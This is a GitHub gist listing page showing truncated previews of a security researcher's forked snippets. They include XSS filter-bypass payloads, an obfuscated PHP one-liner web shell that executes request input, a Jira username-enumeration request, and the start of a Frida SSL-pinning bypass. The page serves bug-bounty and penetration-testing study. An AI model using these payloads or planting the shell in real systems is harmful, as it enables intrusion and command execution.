Skip to content

Instantly share code, notes, and snippets.

View 0xSojalSec's full-sized avatar
🤒
Out sick

MD ISMAIL SOJAL 0xSojalSec

🤒
Out sick
924 followers · 2.3k following
View GitHub Profile
@0xSojalSec
0xSojalSec / mutation_a.txt
Created February 12, 2023 17:19 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@0xSojalSec
0xSojalSec / rev_shell.php
Created January 28, 2023 18:46 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@0xSojalSec
0xSojalSec / juicy.sh
Created January 2, 2023 14:43 — forked from incogbyte/juicy.sh
fast juicy files with tomnomnom wordlist and ffuf tool
#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt
filename="$1"
while read -r line; do
name="$line"
@0xSojalSec
0xSojalSec / mixunpin.js
Created December 11, 2022 17:40 — forked from incogbyte/mixunpin.js
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@0xSojalSec
0xSojalSec / bounty_wildcards.json
Created November 4, 2022 20:12 — forked from 0xtavi/bounty_wildcards.json
Bug Bounty Paying Programs Wildcard Domains
{
"programs": [
{
"name": "spacex",
"url": "https://bugcrowd.com/spacex",
"wildcards": [
"starlink.com",
"starlinkisp.net"
],
"out_of_scope_domains": [],
@0xSojalSec
0xSojalSec / Jira bug-exploit
Created November 3, 2022 19:03 — forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================
@0xSojalSec
0xSojalSec / google-dorks
Created November 3, 2022 18:52 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@0xSojalSec
0xSojalSec / gist:87bd6be4e0ff1c087bbfae33c36c38d3
Created August 24, 2022 17:54 — forked from melvinsh/permutations-medium.txt
Permutations Medium
acc
accept
acceptatie
access
accounts
alpha
alt
api
app
apps
@0xSojalSec
0xSojalSec / Security Engineer - Interview Questions.md
Created August 22, 2022 12:27 — forked from namishelex01/Security Engineer - Interview Questions.md
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names

Core Information Security

  • What is information security and how is it achieved?

  • What are the core principles of information security?

  • What is the CIA triangle?

  • What is non-repudiation (as it applies to IT security)?

@0xSojalSec
0xSojalSec / Security Interview Questions
Created August 22, 2022 12:27 — forked from boodera/Security Interview Questions
Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in and even if they do, They don’t have any idea on what type of questions they might face in an interview.
Recently
@Miss_Malware
asked for everyone’s favourites security analyst and DFIR interview question that gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview.